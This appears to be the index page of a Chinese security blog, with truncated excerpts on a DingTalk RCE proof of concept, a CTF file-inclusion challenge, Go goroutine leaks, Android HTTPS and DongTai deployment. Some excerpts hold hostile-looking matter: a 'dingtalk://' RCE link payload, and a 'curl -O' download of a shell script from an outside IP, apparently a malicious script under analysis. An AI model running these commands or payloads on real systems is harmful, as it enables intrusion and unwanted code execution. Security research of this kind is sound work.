钉钉RCE大佬的POC:https://github.com/crazy0x70/dingtalk-RCE 复现: 本地开一个服务 python3 -m http.server 输入: dingtalk://dingtalkclient/page/link?url=http://...
date_range2022-02-16 bookmark_border web安全
curl -O 2.58.149.237:6972/hoze 文件内容为: #!/bin/bash cores=$(nproc) temp=$(cat /proc/meminfo | grep MemAvailable | awk '{print$2...
date_range2022-02-08 bookmark_border shell
goroutine泄露这里所说的Go内存泄露是指goroutine泄露。如果你启动了1个goroutine,但并没有符合预期的退出,直到程序结束,此goroutine才退出,这种情况就是goroutine泄露。在此之前先来认识一下pprof,pprof是Go的性能分析工具,在程序运行过程中,可以记录程序的运行信息,可以是CPU使用情况、内存使用情况...
date_range2021-12-28 bookmark_border web安全
源码源码来自:https://github.com/Ch3nYe/httpstest 参考文章:https://ch3nye.top/Android-HTTPS%E8%AE%A4%E8%AF%81%E7%9A%84N%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%92%8C%E5%AF%B9%E6%8A%97%E6%96%B9%E6%...
date_range2021-12-22 bookmark_border Android逆向
安装按照官方文档,https://doc.dongtai.io/02_start/index.html 使用docker来安装,直接执行 git clone https://github.com/HXSecurity/DongTai.git cd deploy/docker-compose/...
date_range2021-12-09 bookmark_border web安全
端午就该吃粽子访问login.php,会给一个这样的链接http://www.bmzclub.cn:22937/login.php?zhongzi=show.php 看样子是文件读取的漏洞,尝试读取一个passwd文件。 可以直接读取,再去试试根目录下的flag文件,提示你是偷粽子的。从匹配上看是只要存在flag这个词就不行。 尝试利用远程包含...
date_range2021-10-19 bookmark_border 渗透测试